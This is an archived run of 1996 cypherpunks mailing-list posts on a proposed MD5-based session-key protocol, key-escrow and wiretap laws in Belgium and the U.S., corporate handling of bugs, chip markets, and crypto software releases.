> When starting the connection, client sends 128 random bits to the server.
> 
> Both ends take this data, append the passphrase, and use MD5 to generate 
> a session key. If a key of less than 128 bits is required for legal 
> reasons, then the appropriate number of bits are retained, and the rest 
> replaced with bits from the random data that was sent in the clear.
> 
> That is, if you're only allowed 40 bit security, you take the first 88
> bits that you were sent, and append the last 40 bits of the generated key 
> to give you the session key to use.

So this is:

Salt = RNG(128,Seed);
SessionKey = MD5(Salt | PassPhrase);

Or for export:

Salt = RNG(128,Seed);
Temp = MD5(Salt | PassPhrase);
SessionKey = 
    (Salt[1..(128 - NumExportBits)] | Temp[(128 - NumExportBits + 1)..128]);

Sounds good, assuming the passphrase is nice and long (i.e. 128 bits, or
NumExportBits) and MD5 holds up.

If you haven't already, you might want to look at some of the work Hugo
Krawczyk and some others have been doing on keyed MD5. Their application is
different (primarily, authentication) but I think many of the concerns are
similar. Look for draft-krawczyk-keyed-md5-01.txt in the usual places. "It
is not appropriate to use Internet Drafts as reference material, or to cite
them other than as a ``working draft'' or ``work in progress''."

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPLHrCnaAKQPVHDZAQEoNQf/UCk2GwCMDqjodyqqduEUrbcOZFyBXsuV
RPSUqgo7GcJ7HpPqzgQyEREW71g9iSfpzqMDihjjJK1SJGfKS6dy60wYSbYtNrta
sEeLWDfpABTW7CgbpYaeDrMug1ASmcRThjeTzRqXyhUiWDFloNw7yASnyzbH4o+M
cVgwSTTBlvvxpvgOnXtLpr85a14FBBOXlsq5dWcaUW2V0+bt6qsbgeLqTUpCrtn5
dkzjprekBIxxQOwFh9vSKjXaBdhZAgmzI0nRVOmOBAxj2KSoGHqKwpUmQfx7yZeP
nJuGUPA0E+hgmPqTBv6e9CQSZmpY+x932YH7jWOrgscS/HQJYLq+4g==
=nyGN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Wed, 10 Jan 1996 00:03:03 +0800
To: cypherpunks@toad.com
Subject: Can you break my encryption protocol ?
Message-ID: <Pine.3.89.9601091514.A24844-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm trying to put together a simple protocol for encrypting confidential
but typically low-value data (i.e. I don't want people to be able to read
it, but in most cases it wouldn't be catastrophic if they could). I want
it to be completely license-free, so I can't use RSA or other patented
algorithms. It also would only be used inside one organisation, so key
management isn't so much of a problem, and the main attack it has to 
defend against is packet-sniffing on the Net. It also has to support 
variable-length keys for ITAR.. 

The idea is as follows..


Client and server both have copies of a passphrase, of any length.

When starting the connection, client sends 128 random bits to the server.

Both ends take this data, append the passphrase, and use MD5 to generate 
a session key. If a key of less than 128 bits is required for legal 
reasons, then the appropriate number of bits are retained, and the rest 
replaced with bits from the random data that was sent in the clear.

That is, if you're only allowed 40 bit security, you take the first 88
bits that you were sent, and append the last 40 bits of the generated key 
to give you the session key to use.

You then go off and encrypt the session (probably using 3DES or Blowfish). 


Can anyone spot any flaws in this system ? The only potential problem I
can see would be that by cracking a number of sessions you could work out
the passphrase. However, I think the number required would still be
infeasible. 

Also, are there any known problems with using Blowfish for encrypting a
data stream ? I'm assuming it's OK as it's used in PGPfone. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 10 Jan 1996 08:03:38 +0800
To: cypherpunks@toad.com
Subject: Book on Electronic Commerce
Message-ID: <01HZTEQR5AE8A0UD8R@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu"  7-JAN-1996 08:47:56.17

Date: Sat, 6 Jan 1996 12:32:20 -0600 (CST)
From: "Andrew B. Whinston" <abw@uts.cc.utexas.edu>
To: misfaculty@moe.cc.utexas.edu
Subject: Electronic Commerce

Hi:

We are pleased to announce the publication of a new book on electronic
commerce titled: FRONTIERS of ELECTRONIC COMMERCE (868 pages).

The publisher is Addison-Wesley (1-800-822-6339) and the ISBN no. is
0-201-84520-2.

For more details --
Preface,
Chapter 1,
Research issues in Online Banking 
Syllabus of course using the book,
Tranparencies of talks on Electronic Commerce  --

see:          http://commerce.ssb.rochester.edu/book.html

==================
Table of Contents:
==================

Frontiers of Electronic Commerce
Ravi Kalakota, University of Rochester and
Andrew B. Whinston, University of Texas at Austin
ISBN: 0-201-84520-2, 868 pp., softcover, 1996.

      Preface

      1 Welcome to Electronic Commerce
         1.Electronic Commerce Framework
         2.Electronic Commerce and Media Convergence
         3.The Anatomy of E-Commerce Applications
         4.Electronic Commerce Consumer Applications
         5.Electronic Commerce Organization Applications
         6.Summary

      2 The Network Infrastructure for Electronic Commerce
         1.Market Forces Influencing the I-Way
         2.Components of the I-Way
         3.Network Access Equipment
         4.The Last Mile: Local Roads and Access Ramps
         5.Global Information Distribution Networks
         6.Public Policy Issues Shaping the I-Way
         7.Summary

      3 The Internet as a Network Infrastructure
         1.The Internet Terminology
         2.Chronological History of the Internet
         3.NSFNET: Architecture and Components
         4.National Research and Education Network
         5.Globalization of the Academic Internet
         6.Internet Governance: The Internet Society
         7.An Overview of Internet Applications
         8.Summary

      4 The Business of Internet Commercialization
         1.Telco/Cable/On-Line Companies
         2.National Independent ISPs
         3.Regional-Level ISPs
         4.Local-Level ISPs
         5.Service Providers Abroad
         6.Service Provider Connectivity: Network Interconnection Points
         7.Internet Connectivity Options
         8.Logistics of Being an Internet Service Provider
         9.Summary

      5 Network Security and Firewalls
         1.ClientÜServer Network Security
         2.Emerging ClientÜServer Security Threats
         3.Firewalls and Network Security
         4.Data and Message Security
         5.Challenge-Response Systems
         6.Encrypted Documents and Electronic Mail
         7.U.S. Government Regulations and Encryption
         8.Summary

      6 Electronic Commerce and World Wide Web
         1.Architectural Framework for Electronic Commerce
         2.World Wide Web (WWW) as the Architecture
         3.Web Background: Hypertext Publishing
         4.Technology behind the Web
         5.Security and the Web
         6.Summary

      7 Consumer-Oriented Electronic Commerce
         1.Consumer-Oriented Applications
         2.Mercantile Process Models
         3.Mercantile Models from the Consumer's Perspective
         4.Mercantile Models from the Merchant's Perspective
         5.Summary

      8 Electronic Payment Systems
         1.Types of Electronic Payment Systems
         2.Digital Token-Based Electronic Payment Systems
         3.Smart Cards and Electronic Payment Systems
         4.Credit Card-Based Electronic Payment Systems
         5.Risk and Electronic Payment Systems
         6.Designing Electronic Payment Systems
         7.Summary

      9 Interorganizational Commerce and EDI
         1.Electronic Data Interchange
         2.EDI Applications in Business
         3.EDI: Legal, Security, and Privacy Issues
         4.EDI and Electronic Commerce
         5.Summary

      10 EDI Implementation MIME, and Value-Added Networks
         1.Standardization and EDI
         2.EDI Software Implementation
         3.EDI Envelope for Message Transport
         4.Value-Added Networks (VANs)
         5.Internet-Based EDI
         6.Summary

      11 Intraorganizational Electronic Commerce
         1.Internal Information Systems
         2.Macroforces and Internal Commerce
         3.Work-flow Automation and Coordination
         4.Customization and Internal Commerce
         5.Supply Chain Management (SCM)
         6.Summary

      12 The Corporate Digital Library
         1.Dimensions of Internal Electronic Commerce Systems
         2.Making a Business Case for a Document Library
         3.Types of Digital Documents
         4.Issues behind Document Infrastructure
         5.Corporate Data Warehouses
         6.Summary

      13 Advertising and Marketing on the Internet
         1.The New Age of Information-Based Marketing
         2.Advertising on the Internet
         3.Charting the On-Line Marketing Process
         4.Market Research
         5.Summary

      14 Consumer Search and Resource Discovery
         1.Search and Resource Discovery Paradigms
         2.Information Search and Retrieval
         3.Electronic Commerce Catalogs or Directories
         4.Information Filtering
         5.Consumer-Data Interface: Emerging Tools
         6.Summary

      15 On-Demand Education and Digital Copyrights
         1.Computer-Based Education and Training
         2.Technological Components of Education On-Demand
         3.Digital Copyrights and Electronic Commerce
         4.Summary

      16 Software Agents
         1.History of Software Agents
         2.Characteristics and Properties of Agents
         3.The Technology behind Software Agents
         4.Telescript Agent Language
         5.Safe-Tcl
         6.Applets, Browsers, and Software Agents
         7.Software Agents in Action
         8.Summary

      17 The Internet Protocol Suite
         1.Layers and Networking
         2.Internet Protocol Suite
         3.Desktop TCP/IP: SLIP and PPP
         4.Other Forms of IP-Based Networking
         5.Mobile TCP/IP-Based Networking
         6.Multicast IP
         7.Next Generation IP (IPng)
         8.Summary

      18 Multimedia and Digital Video
         1.Key Multimedia Concepts
         2.Digital Video and Electronic Commerce
         3.Desktop Video Processing
         4.Desktop Video Conferencing
         5.Summary

      19 Broadband Telecommunications
         1.Broadband Background Concepts
         2.Frame Relay
         3.Cell Relay
         4.Switched Multimegabit Data Service (SMDS)
         5.Asynchronous Transfer Mode (ATM)
         6.Summary

      20 Mobile and Wireless Computing Fundamentals
         1.Mobile Computing Framework
         2.Wireless Delivery Technology and Switching Methods
         3.Mobile Information Access Devices
         4.Mobile Data Internetworking Standards
         5.Cellular Data Communications Protocols
         6.Mobile Computing Applications
         7.Personal Communication Services (PCS)
         8.Summary

      21 Structured Documents
         1.Structured Document Fundamentals
         2.Standard Generalized Markup Language (SGML)
         3.Summary

      22 Active/Compound Document Architecture
         1.Defining Active Documents
         2.Approaches to Active Documents
         3.Object Linking and Embedding
         4.OpenDoc
         5.COBRA: Distributed Objects
         6.Summary

      References

      Index


-- Ravi
__________________________________________________________________________
Ravi Kalakota                   POTS: (716) 275-3102    Fax: (716)273-1140
Xerox Assistant Professor of Information Systems
Simon School--University of Rochester
Rochester, New York 14627          e-mail: kalakota@uhura.cc.rochester.edu
__________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Jan 1996 10:57:53 +0800
To: cypherpunks@toad.com
Subject: Re: Why Companies are Poor at Finding Bugs
Message-ID: <2.2.32.19960110024957.00963960@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:53 PM 1/9/96 -0800, Tim May wrote:

>And this has always been a major role of extra-corporate agents: safety
>inspectors, insurance companies, independent testing laboratories, and so
>on. The in-house testing departments are frequently inclined to overstate
>concerns (known universally as "CYA," for "cover your ass"), so it is not
>surprising that their concerns are often treated as a non-urgent matter.
>Until a crisis happens, then they are lambasted for not having spoken up
>more loudly and more forcefully.

I have seen this before in a number of companies...  I think it is becuase
alot of management is trained to think of things in the positive.  To try
and put the best spin on any situation...  On the other hand, people of a
technical bent tend to think of things as problems to be solved.  Such an
outlook is seen as negative.  The two outlooks seem to conflict on many
levels. Such outlooks from management tend to delay resolution of problems
until it is too late...

>This was true in ancient Sumeria, in the early factories in Europe, on the
>communes in China, and in the high-tech labs of today. An easily
>understandable mixture of psychology, systems analysis, group dynamics,
>economics, and evolutionary game theory.

You forgot the works of Machivelli...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jan 1996 09:46:15 +0800
To: cypherpunks@toad.com
Subject: Why Companies are Poor at Finding Bugs
Message-ID: <ad1853ba05021004d07c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:37 AM 1/9/96, Lucky Green wrote:

>Very true. But why does it always seem to take an exploitable crack before
>companies pay attention to security flaws? Is it because they are unable to
>admit that they have made a mistake? Everybody makes mistakes. What's the
>big deal? I really don't understand it. Any psychologists on this list?

I'm not a psychologist, though I doubt that would help. (Having had a
girlfriend who was one, she had no special knowledge about corporate
motivations...)

Companies are pyramids, with a flood of signals flowing up and down the
pyramid. Few of the signals are truly important, most are just noise. Hence
the difficulty with corporations responding to crises.

When a confirmation of a serious problem is made--a building collapses, a
floating point bug is found in a chip, a random number generator is found
to be flawed, etc.--then there is little doubt that a real problem exists,
or at least that a public relations problem must be dealt with. Therefore,
a flurry of corporate activity ensues, task forces are created, press
releases issued, etc.

I'm neither surprised nor disheartened by this. It often takes hitting a
company over the head with a two-by-four..."to get their attention."

(I saw this many times at Intel, and they were ahead of most of their
rivals in spotting problems early on. The "Pentium debacle" is a perfect
example of what Lucky is decrying, as internal memos on the problem had
been basically pooh-poohed and ignored, until a major public relations
disaster hit.)

And this has always been a major role of extra-corporate agents: safety
inspectors, insurance companies, independent testing laboratories, and so
on. The in-house testing departments are frequently inclined to overstate
concerns (known universally as "CYA," for "cover your ass"), so it is not
surprising that their concerns are often treated as a non-urgent matter.
Until a crisis happens, then they are lambasted for not having spoken up
more loudly and more forcefully.

This was true in ancient Sumeria, in the early factories in Europe, on the
communes in China, and in the high-tech labs of today. An easily
understandable mixture of psychology, systems analysis, group dynamics,
economics, and evolutionary game theory.

The Cypherpunks group is, to some extent, helping in this process by trying
to break or cripple new software. (As several of us have noted, the NSA's
second official role, that of securing commercial cryptography, COMSEC,
seems to have been ignored. We are thus left to fill in for these
slackers.)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jan 1996 10:13:34 +0800
To: cypherpunks@toad.com
Subject: RISC not everything
Message-ID: <ad185be407021004bb85@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:24 PM 1/9/96, Kent Dahlgren wrote:

>better way to tell them?  Maybe I'm just paranoid.  Its just that I kind
>of feel sorry for DEC; its not easy being burdened with the worst
>marketing staff in the world, having the world's fastest RISC processor,
>and having the media go wild over the P6.

I'm also a fan of Alta Vista, and use it daily. And I'd love to have a DEC
Alpha workstation.

However, there's more to success than being "the world's fastest RISC
processor," as history has shown for the past decade or so. (Amongst other
things, the SPECInts for the Alpha are actually lower than for the P6,
though SPECfps are higher. And some of the MIPS/SGI processors are about as
powerful as either.)

The various high-end Alphas have a high per-chip cost. Very high. (Low-end
Alphas are cheaper, but mainly for good reasons...a low-end Alpha is not
compelling.) The high per-chip cost is associated with the large die size,
DEC's lack of volume in making chips (which largely determines chip
yields), the "mostly clock" layout (the 300 MHz clock is hard to distribute
across the entire die area, and DEC uses a considerable fraction of the
chip area and metallization in distributing the clock without significant
skew), and the architecture.

I'm not a P6 expert (nor do I even own or use any Intel processor machines,
save for an old laptop, a first-generatino IBM PC, and a 1978-era Sol), but
my friend John Wharton has written glowingly of the P6 architectural
innovations in the P6.

In any case, Intel has the manufacturing machine able to make Pentiums in
large enough volume for low enough cost to be a major market force. DEC
does not have the same advantages.

There are of course lots of issues to consider. If NT is as successful as I
think it will be (see, I'm not _only_ a basher of Microsoft!), and if the
versions of software for NT will not require extensive tuning for various
platforms, then I think Intel's dominance will be slightly weakened.
However, Intel is not standing still--it's busy building several new fabs
that each cost more than a billion dollars (including one that will cost $2
B). Its "P7" processor is far along in development, and reportedly will
merge today's features with "very long instruction word" (VLIW) techniques.

DEC is back to making profits, but it sure wasn't for several years while
it coasted on the work done earlier on the VAX.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 10 Jan 1996 10:15:24 +0800
To: mfischer@nsi.edu
Subject: Re: WIRE TAP ON NET
Message-ID: <01HZTGS7MTBOA0UD8R@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: "Michael S. Fischer" <mfischer@nsi.edu>

>Well, I can't exactly say I feel sorry for the guys, even if cellular
companies are ripping us off.  Anyone who commits crimes while using
email without encryption are idiots.
----------
	While I can't really approve of stealing from the cellular companies,
I do like a lot of the uses of such stolen numbers. Specifically, that they're
being used in ways (such as by drug dealers) that the government doesn't like
at all.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jan 1996 10:44:37 +0800
To: cypherpunks@toad.com
Subject: Scenario: Digital Telephony Leads to GAK
Message-ID: <ad186156090210040315@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks, Leo, for providing this, and the translation into English.


At 7:45 PM 1/9/96, Leo Van Hove wrote:
>I looked up the law mentioned in the newspaper article and it goes like
>this (non french speaking cypherpunks, please see comments below <grin>):
...

>Art. 202 stipulates that Belgacom (= Belgium's leading telephone company)
>and other telecom companies have to cooperate with law enforcement when it
>wants to tap telephone lines - no, sorry, make that telecom lines (!).
>Note that tapping is only allowed under certain circumstances stipulated in
>the so-called Privacy Law (see also my previous posting to this list).

This is almost exactly the same provision that Digital Telephony
established in the U.S., namely, that switch providers (phone companies,
loosely speaking, but possibly more, including packet switches....). More
on this in a moment.


>Art. 203 is the most important as far as key escrow is concerned.  It
>completes Art. 95 of the 1991 Law which stipulated 4 conditions in which
>telecom equipment may be seized. These initial conditions are rather
>harmless (equipment does no longer conform to the initial specifications,
>it hinders public broadcasts, presents health risks for the users,...).
>Art. 203 adds a 5th and stingy one: equipment that makes tapping impossible
>may be disconnected from the network and seized ...  On the face of it -
>I'm not a lawyer, so don't pin me down on this - this means no crypto (or
                                                  ^^^^^^^^^^^^^^^^^^^^^^^^
>only with key escrow) ...
 ^^^^^^^^^^^^^^^^^^^^^

I think this ties in closely with the European meetings on key escrow
(recall that our earliest indications of a move to get "software key
escrow" came from the Karlsruhe meeting in the spring of 1994, and various
international forums on key escrow began soon thereafter).

This fits with several trends I and others here have discussed:

* getting corporations to do as much of the enforcment work as possible.

* using the civil forfeiture and penalty provisions to terrify the
corporations, ISPs, switch providers, etc., to cooperate (I referred to
this as "deputizing" the corporations as soldiers in the government's
wars).

* having Europe launch the crackdowns, then pleading that the U.S. must
"conform" to international treaties and law enforcement agreements. (Some
have argued that the Bavarian version of Exon was a step in this
direction....)

So, we need to be alert for the following scenario:

1. Telephone companies, telecom providers, ISPs, etc., must conform to the
Digital Telephony wiretapping provisions, or variants thereof (not just the
language of Digital Telephony, but also language in pending and future
bills).

1a. If Exon passes, ISPs may also have to verify ages of users. This would
necessitate a form of "Internet ID card," with all that this implies for
the use of cryptography, anonymity, etc.

2. European companies (private, and PTTs) set the precedent.

3. An exception is made for key escrow. That is, one of the companies in #1
can be held harmless if it has taken major steps to ensure that users are
not using encryption that is not properly escrowed. That is, they can
escape the Title 18 fines and seizure of their equipment if they
"cooperate" with "valid investigations."

4. A few prosecutions will likely have to made, just to make sure the
message is properly received. (Like the two-by-four over the head I
mentioned in my last message.)

5. A panic sets in. Just as CompuServe dumped 200 newsgroups on the whiff
that a prosecution and seizure might happen, many ISPs will ignorantly send
out warnings to users that all encrypted messages must use GAK. (To be
sure, not all will. Some will ignore the warnings, some will contemptuously
flout the law, etc.)

6. The government gets a large fraction of messages into a GAK format. Once
again, corporations and ISPs become the deputies.

(Note: Sure, superencryption still works, and no GAK system will be
universally successful. Maybe not even successful in a majority of cases.
But probably enough to cripple large-scale usage and, especially,
commercial payment usage. This may be enough for the IRS, FinCen, etc.)

We really need to be looking to what the nations of Europe are doing (as we
have been of course, as the crypto laws of Europe have always been
interesting to us, even if the machinations of the U.S. get most of the
attention, for obvious reasons).

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 10 Jan 1996 09:47:42 +0800
To: cypherpunks@toad.com
Subject: IRS/FBI story re Internet
Message-ID: <01HZTIGWNLFGA0UD8R@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  9-JAN-1996 20:19:54.25
To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"

IRS, FBI EYE INTERNET WITH SUSPICION
The Clinton administration's reluctance to ease up on export controls for
encryption software stems in part from pressure from U.S. law enforcement
agencies, and the owner of a New York-based software company sees heavy
lobbying behind the government's desire to regulate content on the Internet:
"I think the Internal Revenue Service and the FBI are watching this one very
carefully.  They wouldn't mind seeing the government set a precedent for
deciding what can and cannot go on the Internet."  The IRS fears that easy
access to cheap and sophisticated encryption software will make income- and
sales-tax evasion too easy, and the FBI worries about criminal and terrorist
plots hatched in cyberspace, but some observers say government control
tactics are too little, too late.  A Hudson Institute economist says,
"Electronic money gets really interesting when you realize how impossible it
is to put national walls around it, mandate the use of national currencies,
or require that transactions go through banks...  The country will have no
practical choice but to rely more than ever on voluntary tax compliance.
That means tax rates will have to be kept as low as possible on people and
on businesses."  (Investor's Business Daily 9 Jan 96 B1)

[...]

EDUPAGE is what you've just finished reading.  (Please note that it's
"Edupage" and not "EduPage.")  To subscribe to Edupage: send a message to:
listproc@educom.unc.edu and in the body of the message type: subscribe
edupage Warren Buffett (assuming that your name is Warren Buffett;  if it's
not, substitute your own name).  ...  To cancel, send a message to:
listproc@educom.unc.edu and in the body of the message type: unsubscribe
edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lvhove@vnet3.vub.ac.be (Leo Van Hove)
Date: Wed, 10 Jan 1996 23:22:43 +0800
To: cypherpunks@toad.com
Subject: More on Belgian 'key escrow law'
Message-ID: <v01530504ad18686fc402@[134.184.16.171]>
MIME-Version: 1.0
Content-Type: text/plain


I looked up the law mentioned in the newspaper article and it goes like
this (non french speaking cypherpunks, please see comments below <grin>):

----

"Loi du 21 décembre 1994 portant des dispositions sociales et diverses" -
published in the 'Moniteur Belge' (= the official journal in which all laws
are published), Vol. 164, Nr. 250, Friday 23 December 1994, p. 31878-31963.

(p. 31960-31961):
"
                                        Art. 202

        Il est inséré dans la loi du 21 mars 1991 portant réforme de
certaines entreprises publiques économiques, un article 70bis, rédigé comme
suit:

        <<Art. 70bis - Le Roi fixe, par arrêté délibéré en Conseil des
Ministres, les moyens techniques par lesquels Belgacom et les exploitants
des services non réservés qu'Il désigne doivent permettre, le cas échéant
éventuellement conjointement, le repérage, les écoutes, la prise de
connaissance et l'enregistrement des télécommunications privées dans les
conditions prévues par la loi du 30 juin 1994 relative à la protection de
la vie privée contre les écoutes, la prise de connaissance et
l'enregistrement de communications et de télécommunications privées.>>"

(p. 31961):
"
                                        Art. 203

        L'article 95, alinéa 1er, de la même loi est complété comme suit:

        <<5° l'appareil terminal rends inefficaces les moyens permettant,
dans les conditions prévues aux articles 88bis et 90ter à 90decies du Code
d'instruction criminelle, le repérage, les écoutes, la prise de
connaissance et l'enregistrement des télécommunications.>>"

----

Simplifying it all seems to boil down to this:
The 1994 Law ammends a 1991 Law; that is, it adds a couple of
articles/paragraphs.

Art. 202 stipulates that Belgacom (= Belgium's leading telephone company)
and other telecom companies have to cooperate with law enforcement when it
wants to tap telephone lines - no, sorry, make that telecom lines (!).
Note that tapping is only allowed under certain circumstances stipulated in
the so-called Privacy Law (see also my previous posting to this list).

Art. 203 is the most important as far as key escrow is concerned.  It
completes Art. 95 of the 1991 Law which stipulated 4 conditions in which
telecom equipment may be seized. These initial conditions are rather
harmless (equipment does no longer conform to the initial specifications,
it hinders public broadcasts, presents health risks for the users,...).
Art. 203 adds a 5th and stingy one: equipment that makes tapping impossible
may be disconnected from the network and seized ...  On the face of it -
I'm not a lawyer, so don't pin me down on this - this means no crypto (or
only with key escrow) ...

Ciao,

leo







_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 2 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove@vnet3.vub.ac.be

VUB's Web site: http://www.vub.ac.be
_________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kolivet@alpha.c2.org
Date: Wed, 10 Jan 1996 13:19:39 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft continues to mislead public about Windows security
Message-ID: <199601100451.UAA13211@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jan 1996, Frank Willoughby wrote:

> When a system is breached or a CERT Advisory is issued, this is a major
> embarassment for the company.  The breach (or publicized security flaw)
> shakes the confidence of people in the vendor's products.  People are 
> rather unwilling to risk putting their business-critical data on a system 
> which has just recently breached.  This lack of confidence translates into
> a loss in sales.  If unchecked or the case if severe enough, this could 
> also translate into a loss of jobs.

What are CERT's criteria for a bulletin to be issued?  Would the previously
mentioned Windows NT and Windows 95 security bugs qualify?

- Kay Olivetti





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Wed, 10 Jan 1996 13:47:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.16.19960110022146.3717051a@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone bought the disks mentioned in applied cryptography? Are they
anvailable anywhere online to citizens of the US?

--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Wed, 10 Jan 1996 10:45:52 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS for DOS v0.3.5 (NEW!)
Message-ID: <199601100247.VAA20366@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain




The latest version of NOISE.SYS (v0.3.5-Beta) can be gotten
via anonymous ftp at ftp.funet.fi/pub/crypt/random/noise035.zip

NOISE.SYS is a /dev/random driver for DOS systems running on
386 or later processors.  It will sample fast timings between
keystrokes and disk access, as well as changes in mouse position
and CPU-clock drift, mixing with SHA-2 message digest to generate
crypto-quality random numbers.

Added in this version:
  Added documentation!!!
  Fixed timer sampling bug
  Fixed clock drift sampling (better entropy too)
  Added mouse position sampling
  Different accumulation function
  Lots of other changes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 10 Jan 1996 16:25:07 +0800
To: cypherpunks@toad.com
Subject: SSH for Windows
Message-ID: <199601100334.VAA13005@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


...can be found at URL http://public.srce.hr/~cigaly/ssh/.  FYI.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 10 Jan 1996 13:23:26 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: PRIVACY: Private traces in public places
In-Reply-To: <Pine.SV4.3.91.960109232922.15111B-100000@larry.infi.net>
Message-ID: <199601100511.XAA20243@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Governments or whoever, can do all they want to make their collection of 
> dossiers bulge even bigger than they are. But, these dossiers are only 
> data sets. Data isn't quite the same os information. Information isn't 
> quite the same as knowledge. Knowledge isn't quite the same as 
> understanding. And understanding the situation has not been, 
> historically, enough to ensure that government (or whoever) decision 
> makers make the "right" decision.
> 
> Let the internal security apparatchiks spin the bottle all they want. 
> They couldn't keep Rome from falling, nor the Byzantine Empire, nor the 
> Ottoman Sultanate. They couldn't keep the Third Reich in place for a 
> thousand years. They couldn't keep the Soviet Union glued together by 
> force nor dirty persuasion nor extortionate non-economics.

The problem, as I see it, is that you can have too much information. 
Information takes up room, takes up CPU cycles to process and store and
retrieve, and the worst part is, it takes a human to evaluate it.  No
computer in the world is going to be able to evaluate incoming humint for
reliability.  That takes a human, and I suspect that it will be that way
for quite some time.  The more information you gather, the worse the
problem gets, until you have this massive database of information, all
indexed and stuff, at your fingertips, but it's useless, because you can't
tell whether it's real or BS or disinformation. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
